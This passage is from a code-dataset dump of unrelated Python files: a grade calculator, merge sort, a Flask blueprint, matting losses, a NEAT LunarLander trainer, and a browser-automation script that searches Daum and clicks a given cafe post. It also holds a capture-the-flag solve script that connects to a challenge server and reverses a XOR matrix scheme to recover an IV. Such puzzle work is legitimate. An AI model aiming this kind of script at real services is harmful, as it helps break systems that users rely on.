list2[3])\ngoto(list2[:2])\n\nmainloop()\n","sub_path":"session5/exercise_11_12.py","file_name":"exercise_11_12.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"526911822","text":"import telnetlib\n\ndef connect(host, ip):\n return telnetlib.Telnet(host, ip)\n\ndef readline(tel):\n return tel.read_until(b'\\n').decode('utf8')\n\ndef pad(s):\n if len(s)%9 == 0:\n return s\n for i in range((9-(len(s)%9))):\n s.append(0)\n return s\n\ndef decode(seed, res):\n IV = []\n seed = pad(seed)\n print(seed)\n for i in range(9):\n if (len(seed) // 9) % 2 == 1:\n x = res[i//3][i%3]\n else:\n x = res[i%3][i//3]\n for j in range(len(seed)//9):\n if (i != 0) and (i != 8):\n print(i)\n if j % 2 == 0:\n x ^= seed[i + j*9]\n else:\n if (i%2) == 0:\n x ^= seed[(8-i) + j*9]\n else:\n if i == 1:\n x ^= seed[3 +j*9]\n elif i == 3:\n x ^= seed[1 +j*9]\n elif i == 5:\n x ^= seed[7 +j*9]\n elif i == 7:\n x ^= seed[5 +j*9]\n else:\n x ^= seed[i + j*9]\n\n IV.append(x)\n\n return IV[::3]+IV[1::3]+IV[2::3]\ndef main():\n connection = connect('vermatrix.pwn.democrat', '4201')\n line = readline(connection)\n seed = line.split(': 
')[1][:-1]\n    print(seed)\n    res = []\n    line = readline(connection)\n    res.append([int(x) for x in line.strip().split(' ')])\n    print(line)\n    line = readline(connection)\n    res.append([int(x) for x in line.strip().split(' ')])\n    print(line)\n    line = readline(connection)\n    res.append([int(x) for x in line.strip().split(' ')])\n    print(line)\n    print(res)\n    IV = decode([ord(c) for c in seed], res)\n    connection.write((','.join([str(x) for x in IV])).encode('utf8'))\n    print(readline(connection))\n    \nif __name__ == '__main__':\n    main()\n    \n","sub_path":"VermatrixSupreme/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"27261384","text":"'''\n    KC_EJ23\n    Create a program that receives the names and grades of N people until the user types \"terminar\".\n    When finished, it must show each person's average grade.\n'''\n \n_FIN = \"terminar\"\n\n \n# Asks the user for the value until a valid one is entered. The first time, \"terminar\" is not allowed. \ndef pide_nombre(msg, i):\n    nombre = None\n\n    while nombre is None:\n        nombre = input(msg)\n\n        if nombre == _FIN and i == 0:\n            nombre = None\n            print(\"\\n\\tNombre no válido.\\n\")\n        else:\n            if len(nombre) != 0 and len(nombre) > 2 and nombre.isalnum():\n                return nombre\n            else:\n                nombre = None\n                print(\"\\n\\tNombre no válido.\\n\")\n\n# Asks the user for the value until a valid one is entered\ndef pide_nota(msg):\n    nota_pedida = None\n\n    while nota_pedida is None:\n        nota_pedida = valida_nota(input(msg))\n\n        if nota_pedida is None:\n            print(\"\\n\\tNota no válida. Se solicita un valor numérico entre 0 y 10.\\n\")\n\n    return nota_pedida\n\n\n# Validates that the incoming value is numeric between 0 and 10, otherwise returns 'None'\ndef valida_nota(str_nota):\n    try:\n        nota_valida = float(str_nota)\n\n        if nota_valida < 0 or nota_valida > 10:\n            nota_valida = None\n    except:\n        nota_valida = None\n\n    return nota_valida\n\n\n# Main code execution\nif __name__ == \"__main__\":\n\n    lista_alumnos = []\n    \n    fin = False\n    i = 0\n\n    while not fin:\n        \n        dic_alumno = {\"Nombre\": \"\", \"Matemáticas\": 0.0, \"Física\": 0.0, \"Química\": 0.0}\n\n        for key in dic_alumno.keys():\n            if key == \"Nombre\":\n                \n                if i > 0:\n                    print(\"\\nPara dejar de introducir alumnos, escribe: 'terminar'.\")\n                \n                dic_alumno[key] = pide_nombre(\"Introduce el nombre del alumno: \", i)\n                \n                if dic_alumno[\"Nombre\"] == _FIN:\n                    print(\"\")\n                    break\n            else:\n                dic_alumno[key] = pide_nota(\"Introduce su nota de {}: \".format(key))\n        \n        if dic_alumno[\"Nombre\"] != _FIN:\n            lista_alumnos.append(dic_alumno)\n        else:\n            fin = True\n        \n        i += 1\n\n    for n in range(0, len(lista_alumnos)):\n        suma = 0\n        \n        for key in lista_alumnos[n].keys():\n            if key != \"Nombre\":\n                suma += lista_alumnos[n][key]\n        \n        print(\"{}:\\t\\t{}\".format(lista_alumnos[n][\"Nombre\"], round(suma / 3, 2)))\n","sub_path":"KC_EJ23.py","file_name":"KC_EJ23.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"47691926","text":"import traceback\nimport uiautomation as auto\nfrom datetime import datetime\nimport time\nimport logging\n\nlogger = logging.getLogger(__file__)\nlogger.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s %(levelname)-.1s %(lineno)4s:%(funcName)20s 
%(message)s')\nhandler = logging.StreamHandler()\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\ndef chrome_daum_cafe(keyword, url, target):\n start_fun = datetime.now()\n result = False\n\n try:\n logger.info(\"=\" * 80)\n logger.info(f\"keyword: {keyword} / target: {target}\")\n logger.info(\"=\" * 80)\n\n logger.info(f\"[1/6] 크롬 브라우저 검색\")\n browser = auto.PaneControl(ClassName=\"Chrome_WidgetWin_1\")\n if browser.Exists(5, 1):\n browser.SetActive()\n else:\n return False\n\n logger.info(f\"[2/6] 글꼴 크기 100%로 변경\")\n auto.SendKeys(\"{Ctrl}0\")\n\n logger.info(f\"[3/6] URL 입력 박스에 URL 입력\")\n control = browser.EditControl(Name=\"주소창 및 검색창\")\n if control.Exists(5, 1):\n control.Click()\n control.SendKeys(\"https://search.daum.net/search?w=cafe&nil_search=btn&DA=NTB&enc=utf8&ASearchType=1&lpp=10&rlang=0&q=\")\n control.SendKeys(\"{Enter}\")\n else:\n return False\n\n logger.info(f\"[4/6] 페이지 로드 확인\")\n while browser.Name != \"– Daum 검색 - Chrome\":\n time.sleep(0.1)\n\n browser = auto.PaneControl(Name=\"– Daum 검색 - Chrome\")\n if browser.Exists(20, 1):\n pass\n else:\n return False\n\n time.sleep(1)\n\n logger.info(f\"[5/6] 검색 키워드 입력\")\n control = browser.EditControl(Name=\"검색어 입력\")\n if control.Exists(5, 1):\n while control.BoundingRectangle.width() == 0 and control.BoundingRectangle.height() == 0:\n logger.info(f'클릭 가능할때까지 1초 대기')\n time.sleep(1)\n control.Click()\n control.SendKeys(keyword, interval=0.1)\n control.SendKeys(\"{Enter}\")\n else:\n return False\n\n logger.info(f\"[6/6] 검색 결과 페이지에서 제목 검색\")\n browser = auto.PaneControl(Name=f\"{keyword} – Daum 검색 - Chrome\")\n for page_no in range(1, 10 + 1):\n\n logger.info(f' - {page_no} 페이지 검색')\n if page_no == 1:\n pass\n else:\n control = browser.HyperlinkControl(Name=f\"{page_no}\")\n if control.Exists(5, 1):\n auto.SendKey(auto.Keys.VK_END)\n control.Click()\n else:\n return False\n\n control = browser.HyperlinkControl(SubName=target)\n\n if control.Exists(2, 0.5):\n\n if control.BoundingRectangle.width() == 0 and control.BoundingRectangle.height() == 0:\n auto.SendKey(auto.Keys.VK_PAGEDOWN)\n else:\n auto.SendKey(auto.Keys.VK_DOWN)\n\n control.Click()\n time.sleep(1)\n\n tab = auto.EditControl(SubName=target)\n if tab.Exists(10, 1):\n\n time.sleep(1)\n tab.SendKeys(\"{Tab}\")\n time.sleep(3)\n\n for no in range(1, 8):\n auto.SendKey(auto.Keys.VK_PAGEDOWN)\n logger.info(f\"[{no}/{7}] PAGEDOWN 키 누름\")\n time.sleep(0.5)\n\n result = True\n break\n else:\n break\n\n except Exception as e:\n logger.error(f\"{traceback.format_exc()}\")\n\n finally:\n logger.info(f\"소요시간 {(datetime.now() - start_fun).total_seconds():.3f}\")\n\n return result\n\n\nif __name__ == '__main__':\n chrome_daum_cafe('로또블루', 'https://cafe.daum.net/iloveHAMSTER/XyL/1699', '로또뽀또복궈니의 친구정리!!!+친신 받아요^^')\n","sub_path":"daum_cafe.py","file_name":"daum_cafe.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"300171866","text":"#################################################################################\n# WaterTAP Copyright (c) 2020-2023, The Regents of the University of California,\n# through Lawrence Berkeley National Laboratory, Oak Ridge National Laboratory,\n# National Renewable Energy Laboratory, and National Energy Technology\n# Laboratory (subject to receipt of any required approvals from the U.S. Dept.\n# of Energy). 
All rights reserved.\n#\n# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license\n# information, respectively. These files are also available online at the URL\n# \"https://github.com/watertap-org/watertap/\"\n#################################################################################\n\"\"\"\nThis module contains the base class for interacting with WaterTAP data files\nwith zero-order model parameter data.\n\"\"\"\nimport os\nimport yaml\nfrom copy import deepcopy\n\n\nclass Database:\n \"\"\"\n WaterTap Database class.\n\n Used to instantiate an instance of a database for loading parameters\n associated with zero-order models in WaterTap.\n\n Args:\n dbpath - (optional) path to database folder containing yaml files\n\n Returns:\n an instance of a Database object linked to the provided database\n \"\"\"\n\n def __init__(self, dbpath=None):\n self._cached_files = {}\n\n if dbpath is None:\n self._dbpath = os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n \"..\",\n \"data\",\n \"techno_economic\",\n )\n else:\n self._dbpath = dbpath\n\n # Confirm valid path\n if not os.path.isdir(self._dbpath):\n raise OSError(\n f\"Could not find requested path {self._dbpath}. Please \"\n f\"check that this path exists.\"\n )\n\n # Create placeholder _component_list attribute\n self._component_list = None\n\n def get_source_data(self, water_source=None):\n \"\"\"\n Method to retrieve water source definition from database.\n\n Args:\n water_source - (optional) string indicating specific water source.\n If None, the default water source will be used.\n\n Returns:\n dict of parameters defined in database for given water source\n\n Raises:\n KeyError if database has not defined water sources\n \"\"\"\n if \"water_sources\" in self._cached_files:\n # If data is already in cached files use this\n source_data = self._cached_files[\"water_sources\"]\n else:\n # Else load data from required file\n try:\n with open(os.path.join(self._dbpath, \"water_sources.yaml\"), \"r\") as f:\n lines = f.read()\n f.close()\n except OSError:\n raise KeyError(\"Could not find water_sources.yaml in database.\")\n\n source_data = yaml.load(lines, yaml.Loader)\n\n # Store data in cache and return\n self._cached_files[\"water_sources\"] = source_data\n\n # Check that water source is defined\n if water_source is None:\n try:\n water_source = source_data[\"default\"]\n except KeyError:\n raise KeyError(\n \"Database has not defined a default water source and \"\n \"none was provided.\"\n )\n\n return source_data[water_source]\n\n def get_solute_set(self, water_source=None):\n \"\"\"\n Method to retrieve solute set for a given water source.\n\n Args:\n water_source - (optional) string indicating specific water source.\n If None, the default water source will be used.\n\n Returns:\n list of solutes contained in the database for the given source.\n\n Raises:\n KeyError if water source could not be found in database\n \"\"\"\n source_data = self.get_source_data(water_source)\n\n # Get component set for water source\n comp_set = list(source_data[\"solutes\"].keys())\n\n return comp_set\n\n def get_unit_operation_parameters(self, technology, subtype=None):\n \"\"\"\n Method to retrieve parameters for a given technology by subtype.\n\n Args:\n technology - unit operation technology to look up and retrieve\n parameters for.\n subtype - (optional) string or list-of-strings indicating specific\n sub-type of technology to return parameters for. 
If not\n                provided, the default parameters are used instead.\n\n        Returns:\n            dict of parameters for technology and subtype\n\n        Raises:\n            KeyError if technology or subtype could not be found in database\n            TypeError if subtype is not string or list-of-strings\n        \"\"\"\n        params = self._get_technology(technology)\n\n        # Get default parameter set\n        sparams = deepcopy(params[\"default\"])\n\n        if subtype is None:\n            # Return default values\n            pass\n        elif isinstance(subtype, str):\n            try:\n                sparams.update(params[subtype])\n            except KeyError:\n                raise KeyError(\n                    f\"Received unrecognised subtype {subtype} for technology \"\n                    f\"{technology}.\"\n                )\n        else:\n            # Assume subtype is list-like and raise an exception if not\n            try:\n                for s in subtype:\n                    # Iterate through provided subtypes and update parameters\n                    # Note that this will overwrite previous parameters if\n                    # there is overlap, so we might need to be careful in use.\n                    try:\n                        sparams.update(deepcopy(params[s]))\n                    except KeyError:\n                        raise KeyError(\n                            f\"Received unrecognised subtype {s} for \"\n                            f\"technology {technology}.\"\n                        )\n            except TypeError:\n                raise TypeError(\n                    f\"Unexpected type for subtype {subtype}: must be string \"\n                    f\"or list like.\"\n                )\n\n        return sparams\n\n    def flush_cache(self):\n        \"\"\"\n        Method to flush cached files in database object.\n        \"\"\"\n        self._cached_files = {}\n\n    @property\n    def component_list(self):\n        return self._return_component_list()\n\n    def _return_component_list(self):\n        if self._component_list is None:\n            self._load_component_list()\n        return self._component_list\n\n    def _get_technology(self, technology):\n        if technology in self._cached_files:\n            # If data is already in cached files, return\n            return self._cached_files[technology]\n        else:\n            # Else load data from required file\n            try:\n                with open(os.path.join(self._dbpath, technology + \".yaml\"), \"r\") as f:\n                    lines = f.read()\n                    f.close()\n            except OSError:\n                raise KeyError(f\"Could not find entry for {technology} in database.\")\n\n            fdata = yaml.load(lines, yaml.Loader)\n\n            # Store data in cache and return\n            self._cached_files[technology] = fdata\n            return fdata\n\n    def _load_component_list(self):\n        \"\"\"\n        Load list of supported components from component_list.yaml file and\n        store as _component_list attribute.\n\n        Returns:\n            None\n        \"\"\"\n        try:\n            with open(os.path.join(self._dbpath, \"component_list.yaml\"), \"r\") as f:\n                lines = f.read()\n                f.close()\n        except OSError:\n            raise KeyError(\"Could not find component_list.yaml in database.\")\n\n        self._component_list = yaml.load(lines, yaml.Loader)\n","sub_path":"watertap/core/wt_database.py","file_name":"wt_database.py","file_ext":"py","file_size_in_byte":7980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"506964637","text":"import math\nimport random\n\ndef zerolistmaker(n):\n    listofzeros = [0] * n\n    return listofzeros\n\ndef mergeSort(numArray):\n    n = len(numArray)\n    \n    if n == 1:\n        y = numArray\n    else:\n        m = int(math.floor(n/2))\n        y1 = mergeSort(numArray[:m])\n        y2 = mergeSort(numArray[m:n])\n        y = merge(y1,y2)\n    return y\n\ndef merge(x,y):\n    n = len(x)\n    m = len(y)\n    z = m+n\n    sortArray = zerolistmaker(z)\n    \n    indexX = 0\n    indexY = 0\n    \n    for indexZ in range(z):\n        \n        if indexX >= n:\n            sortArray[indexZ] = y[indexY]\n            indexY = indexY + 1\n        elif indexY >= m:\n            sortArray[indexZ] = x[indexX]\n            indexX = indexX + 1\n        elif x[indexX] <= y[indexY]:\n            sortArray[indexZ] = x[indexX]\n            indexX = indexX + 1\n        else:\n            sortArray[indexZ] = y[indexY]\n            indexY = indexY + 1\n\n    return sortArray\n\n\narray = 
[random.randint(1,200) for _ in range(1000)]\narray = mergeSort(array)\nprint(array)\n\n\n\n","sub_path":"mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"202053612","text":"#介绍\nclass Introduce:\n #类的初始化函数\n def __init__(self,Name,Age,Sex,Weight):\n self.ch_name = Name\n self.age = Age\n self.sex = Sex\n self.weight = Weight\n\n def introduce(self):\n print(\"大家好,我是%s,今年%d岁,性别%s,体重%.1f千克\"\n %(self.ch_name,self.age,self.sex,self.weight))\n\n#继承介绍类\nclass JieIntroduce(Introduce):\n hobby = \"编程\"\n def jie_introduce(self):\n print(\"大家好,我是%s,今年%d岁,性别%s,体重%.1f千克,爱好是%s。\"\n %(self.ch_name,self.age,self.sex,self.weight,self.hobby))\n\nj = JieIntroduce(\"罗凡林\",25,\"男\",63)\nj.jie_introduce()","sub_path":"ferry_devel/views/practice/类的继承.py","file_name":"类的继承.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"572376644","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nfrom odoo import api, fields, models, _\nfrom odoo.addons.mail.wizard.mail_compose_message import _reopen\n\n\nclass AccountInvoiceSend(models.TransientModel):\n _inherit = 'account.invoice.send'\n\n @api.onchange('template_id')\n def onchange_template_id(self):\n res = super(AccountInvoiceSend, self).onchange_template_id()\n if self.invoice_ids:\n attachment_ids = self.invoice_ids.mapped(lambda rec: rec.create_attachment())\n self.attachment_ids = self.attachment_ids.ids + attachment_ids[0]\n return res\n","sub_path":"l10n_pe_facturalo/wizard/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"396500679","text":"import datetime\nfrom flask import Blueprint\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for,redirect,session\nfrom werkzeug.utils import redirect\nimport src.models.users.decorators as user_decorators\nfrom src.models.projects.projects import Project\nfrom src.models.users.users import User\nfrom src.models.reminder.notification import Event\n\nprojects_blueprint = Blueprint('projects', __name__)\n\n@projects_blueprint.context_processor\ndef user():\n return dict(user=User.get_by_email(session['email']))\n\n\n\n@projects_blueprint.route('/')\ndef home(project_id):\n return render_template('projects/home.html', project=Project.get_by_id(project_id))\n\n@projects_blueprint.route('/new', methods=['GET','POST'])\ndef new_project():\n if request.method == 'POST':\n name = request.form['name']\n date = ''.join(request.form['due_date'].split('/'))\n due_date = datetime.datetime.strptime(date, '%d%m%Y')\n priority = int(request.form['priority'])\n owner = session['email']\n project = Project(name=name, owner=owner, due_date=due_date, priority=priority)\n project_notif = Event({'Project':project._id},notify=[owner], _id=project._id)\n project.save_to_db()\n project_notif.save_to_db()\n user = User.get_by_email(session['email'])\n user.projects.append(project._id)\n user.save_to_db()\n\n return redirect(url_for('.home', project_id=project._id))\n return render_template('projects/new_project.html')\n\n@projects_blueprint.route('//new-note', methods=['GET', 'POST'])\ndef new_note(project_id):\n if request.method == 'POST':\n project_note = request.form['project-note']\n 
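# A minimal guard (hypothetical sketch) could reject empty notes before saving, e.g.:\n # if not project_note.strip():\n #     return render_template('projects/new_note.html', project=Project.get_by_id(project_id))\n # Otherwise persist the note, log a notification event, and redirect back:\n 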
Project.get_by_id(project_id).add_comment(project_note)\n Event.get_by_id(project_id).project_note_added(session['email'], project_note)\n return redirect(url_for('.home',project_id=project_id))\n return render_template('projects/new_note.html',project=Project.get_by_id(project_id))\n\n@projects_blueprint.route('//new-task', methods=['GET', 'POST'])\ndef new_task(project_id):\n Event.get_by_id(project_id).project_task_added(session['email'])\n return render_template('projects/project_new_task.html',project=Project.get_by_id(project_id))\n\n\n@projects_blueprint.route('/edit/',methods=['GET','POST'])\ndef edit_project(project_id):\n pass","sub_path":"src/models/projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"208735527","text":"import torch\nfrom pytorch_msssim import ssim, ms_ssim, SSIM, MS_SSIM\nimport torch.nn.functional as F\nimport torch.nn as nn\n\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef ssim_loss(y_pred, y_true):\n if len(y_pred.shape) == 3:\n y_pred = y_pred.unsqueeze(0)\n if len(y_true.shape) == 3:\n y_true = y_true.unsqueeze(0)\n return 1 - ms_ssim(y_pred, y_true, data_range=1, size_average=True)\n\n\nclass SegmentationLosses(object):\n def __init__(self, weight=None, batch_average=True, ignore_index=255):\n self.ignore_index = ignore_index\n self.weight = weight\n self.batch_average = batch_average\n\n def build_loss(self, mode='ce'):\n \"\"\"Choices: ['ce' or 'focal']\"\"\"\n if mode == 'ce':\n return self.CrossEntropyLoss\n elif mode == 'focal':\n return self.FocalLoss\n else:\n raise NotImplementedError\n\n def CrossEntropyLoss(self, logit, target):\n n, c, h, w = logit.size()\n criterion = nn.CrossEntropyLoss(\n weight=self.weight, ignore_index=self.ignore_index)\n criterion = criterion.to(device)\n\n loss = criterion(logit, target.long())\n\n if self.batch_average:\n loss /= n\n\n return loss\n\n def FocalLoss(self, logit, target, gamma=2, alpha=0.5):\n n, c, h, w = logit.size()\n criterion = nn.CrossEntropyLoss(\n weight=self.weight, ignore_index=self.ignore_index)\n\n criterion = criterion.to(device)\n\n logpt = -criterion(logit, target.long())\n pt = torch.exp(logpt)\n if alpha is not None:\n logpt *= alpha\n loss = -((1 - pt) ** gamma) * logpt\n\n if self.batch_average:\n loss /= n\n\n return loss\n\n\ndef trimap_prediction_loss(trimap_pred, trimap_true):\n trimap_true[trimap_true == 0] = 0\n trimap_true[trimap_true == 128] = 1\n trimap_true[trimap_true == 255] = 2\n criterion = SegmentationLosses(batch_average=True).build_loss('ce')\n return criterion(trimap_pred, trimap_true)\n\n\ndef alpha_prediction_loss(y_pred, y_true):\n diff = y_pred - y_true\n diff = diff\n return torch.sum(torch.sqrt(torch.pow(diff, 2) + epsilon_sqr)) / (y_true.numel() + epsilon)\n\n\ndef alpha_prediction_loss_with_trimap(y_pred, y_true, trimap):\n weighted = torch.zeros(trimap.shape, device=device)\n weighted[trimap == 128] = 1.\n diff = y_pred - y_true\n diff = diff * weighted\n alpha_loss = torch.sqrt(diff ** 2 + 1e-12)\n return torch.sum(alpha_loss) / (weighted.sum() + 1.)\n\n\nclass LossFunction(object):\n def __init__(self, stage):\n self.stage = stage\n self.trimap_criterion = SegmentationLosses(\n batch_average=True).build_loss('ce')\n\n def __call__(self):\n if self.stage == 'train_trimap':\n return self.trimap_loss\n elif self.stage == 'train_alpha':\n return self.fusion_loss\n\n def trimap_loss(self, 
trimap_pred, trimap_true):\n mask = torch.zeros(trimap_true.shape, device=device)\n # mask[trimap_true == 0] = 0\n mask[trimap_true == 128] = 1\n mask[trimap_true == 255] = 2\n return self.trimap_criterion(trimap_pred, mask)\n\n def alpha_prediction_loss_with_trimap(self, y_pred, y_true, trimap):\n weighted = torch.zeros(trimap.shape, device=device)\n weighted[trimap == 128] = 1.\n diff = y_pred - y_true\n diff = diff * weighted\n alpha_loss = torch.sqrt(diff ** 2 + 1e-12)\n return torch.sum(alpha_loss) / (weighted.sum() + 1.)\n\n def fusion_loss(self, y_pred, y_true, trimap_pred, trimap_true):\n return self.alpha_prediction_loss_with_trimap(y_pred, y_true, trimap_true)\n # + 0.025 * ssim_loss(y_pred, y_true)\n # + 0.01 * self.trimap_loss(trimap_pred, trimap_true)\n","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"63696850","text":"import json\nimport os\n\n\n#获取配置文件\ndef get_config():\n with open(\"./config.json\", \"r\", encoding=\"utf-8\") as f:\n configs = json.load(f)\n return configs\n\n#写入配置文件\ndef set_config(config_class, key, value):\n configs = get_config()\n configs[config_class][key] = value\n with open(\"./config.json\", 'w', encoding=\"utf-8\") as f:\n json.dump(configs, f, ensure_ascii=False, indent=4)\n\n\n\n#获取index_word\ndef get_index_word():\n configs = get_config()\n index_word_path = configs[\"other\"][\"index_word_path\"]\n with open(index_word_path, \"r\", encoding=\"utf-8\") as f:\n index_word = json.load(f)\n return index_word\n\n#获取word_index\ndef get_word_index():\n configs = get_config()\n word_index_path = configs[\"other\"][\"word_index_path\"]\n with open(word_index_path, \"r\", encoding=\"utf-8\") as f:\n word_index = json.load(f)\n return word_index\n\n#根据数据文件夹名获取所有的文件名,包括文本文件名和音频文件名列表\ndef get_all_data_path(data_path):\n #data_path是数据文件夹的路径\n files = os.listdir(data_path) #得到数据文件夹下的所有文件名称list\n text_data_path = files.pop()\n audio_data_path_list = files\n return text_data_path, audio_data_path_list\n\n\nif __name__ == \"__main__\":\n pass","sub_path":"hlp/stt/ds2/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"246978462","text":"# Evolve a control/reward estimation network for the OpenAI Gym\n# LunarLander-v2 environment (https://gym.openai.com/envs/LunarLander-v2).\n# Sample run here: https://gym.openai.com/evaluations/eval_FbKq5MxAS9GlvB7W6ioJkg\n\nfrom __future__ import print_function\n\nimport gym\nimport gym.wrappers\n\nimport matplotlib.pyplot as plt\n\nimport multiprocessing\nimport neat\nimport numpy as np\nimport os\nimport pickle\nimport random\nimport time\n\nimport visualize\n\nenv = gym.make('LunarLander-v2')\n\nprint(\"action space: {0!r}\".format(env.action_space))\nprint(\"observation space: {0!r}\".format(env.observation_space))\n\nenv = gym.wrappers.Monitor(env, 'results', force=True)\n\n\nclass LanderGenome(neat.DefaultGenome):\n def __init__(self, key):\n super().__init__(key)\n self.discount = None\n\n def configure_new(self, config):\n super().configure_new(config)\n self.discount = 0.01 + 0.98 * random.random()\n\n def configure_crossover(self, genome1, genome2, config):\n super().configure_crossover(genome1, genome2, config)\n self.discount = random.choice((genome1.discount, genome2.discount))\n\n def mutate(self, config):\n super().mutate(config)\n self.discount += 
random.gauss(0.0, 0.05)\n self.discount = max(0.01, min(0.99, self.discount))\n\n def distance(self, other, config):\n dist = super().distance(other, config)\n disc_diff = abs(self.discount - other.discount)\n return dist + disc_diff\n\n\ndef compute_fitness(net, episodes):\n reward_error = []\n for score, observations, acts, rewards in episodes:\n for o, a, r in zip(observations, acts, rewards):\n output = net.activate(o)\n reward_error.append(float((output[a] - r) ** 2))\n\n return reward_error\n\n\nclass PooledErrorCompute(object):\n def __init__(self):\n self.pool = multiprocessing.Pool()\n self.test_episodes = []\n\n self.min_reward = -200\n self.max_reward = 200\n\n self.episode_score = []\n self.episode_length = []\n\n def evaluate_genomes(self, genomes, config):\n t0 = time.time()\n nets = []\n for gid, g in genomes:\n nets.append((g, neat.nn.FeedForwardNetwork.create(g, config)))\n g.fitness = []\n\n print(\"network creation time {0}\".format(time.time() - t0))\n t0 = time.time()\n\n episodes = []\n for genome, net in nets:\n observation = env.reset()\n step = 0\n observations = []\n actions = []\n rewards = []\n while 1:\n step += 1\n if step < 200 and random.random() < 0.2:\n action = env.action_space.sample()\n else:\n output = net.activate(observation)\n action = np.argmax(output)\n\n observation, reward, done, info = env.step(action)\n observations.append(observation)\n actions.append(action)\n rewards.append(reward)\n\n if done:\n break\n\n total_score = sum(rewards)\n self.episode_score.append(total_score)\n self.episode_length.append(step)\n\n # Compute discounted rewards.\n m = int(round(np.log(0.01) / np.log(genome.discount)))\n discount_function = [genome.discount ** (m - i) for i in range(m + 1)]\n #rewards = np.array([reward for observation, action, reward in episode])\n disc_rewards = np.convolve(rewards, discount_function)[m:]\n\n # Normalize discounted rewards.\n normed_rewards = 2 * (disc_rewards - self.min_reward) / (self.max_reward - self.min_reward) - 1.0\n\n episodes.append((total_score, observations, actions, normed_rewards))\n genome.fitness = total_score\n\n print(\"simulation run time {0}\".format(time.time() - t0))\n t0 = time.time()\n\n # Randomly choose subset of episodes for evaluation of genome reward estimation.\n #self.test_episodes.extend(random.choice(episodes)[1] for _ in range(20))\n self.test_episodes.extend(episodes)\n #self.test_episodes = [random.choice(self.test_episodes) for _ in range(200)]\n self.test_episodes = self.test_episodes[-1500:]\n eps = [random.choice(self.test_episodes) for _ in range(50)]\n\n print(\"Evaluating {0} test episodes\".format(len(eps)))\n\n jobs = []\n for genome, net in nets:\n jobs.append(self.pool.apply_async(compute_fitness, (net, eps)))\n\n # Assign a composite fitness to each genome; genomes can make progress either\n # by improving their total reward or by making more accurate reward estimates.\n for job, (genome_id, genome) in zip(jobs, genomes):\n reward_error = job.get(timeout=None)\n genome.fitness -= 50 * np.mean(reward_error)\n\n print(\"final fitness compute time {0}\\n\".format(time.time() - t0))\n\n\ndef run():\n # Load the config file, which is assumed to live in\n # the same directory as this script.\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config')\n config = neat.Config(LanderGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_path)\n\n pop = neat.Population(config)\n stats = neat.StatisticsReporter()\n 
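# Attach reporters before evolving: the StatisticsReporter feeds the fitness\n # plots below, StdOutReporter logs per-generation progress, and Checkpointer\n # saves periodic snapshots. A run can later be resumed from a snapshot,\n # e.g. (illustrative filename):\n # pop = neat.Checkpointer.restore_checkpoint('neat-checkpoint-24')\n 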
pop.add_reporter(stats)\n pop.add_reporter(neat.StdOutReporter(True))\n # Checkpoint every 25 generations or 900 seconds.\n pop.add_reporter(neat.Checkpointer(25, 900))\n\n # Run until the winner from a generation is able to solve the environment\n # or the user interrupts the process.\n ec = PooledErrorCompute()\n while 1:\n try:\n pop.run(ec.evaluate_genomes, 1)\n\n visualize.plot_stats(stats, ylog=False, view=False, filename=\"fitness.svg\")\n\n plt.plot(ec.episode_score, 'g-', label='score')\n plt.plot(ec.episode_length, 'b-', label='length')\n plt.grid()\n plt.legend(loc='best')\n plt.savefig(\"scores.svg\")\n plt.close()\n\n mfs = sum(stats.get_fitness_mean()[-5:]) / 5.0\n print(\"Average mean fitness over last 5 generations: {0}\".format(mfs))\n\n mfs = sum(stats.get_fitness_stat(min)[-5:]) / 5.0\n print(\"Average min fitness over last 5 generations: {0}\".format(mfs))\n\n # Use the five best genomes seen so far as an ensemble-ish control system.\n best_genomes = stats.best_unique_genomes(5)\n best_networks = []\n for g in best_genomes:\n best_networks.append(neat.nn.FeedForwardNetwork.create(g, config))\n\n solved = True\n best_scores = []\n for k in range(100):\n observation = env.reset()\n score = 0\n step = 0\n while 1:\n step += 1\n # Use the total reward estimates from all five networks to\n # determine the best action given the current state.\n total_rewards = np.zeros((4,))\n for n in best_networks:\n output = n.activate(observation)\n total_rewards += output\n\n best_action = np.argmax(total_rewards)\n observation, reward, done, info = env.step(best_action)\n score += reward\n env.render()\n if done:\n break\n\n ec.episode_score.append(score)\n ec.episode_length.append(step)\n\n best_scores.append(score)\n avg_score = sum(best_scores) / len(best_scores)\n print(k, score, avg_score)\n if avg_score < 200:\n solved = False\n break\n\n if solved:\n 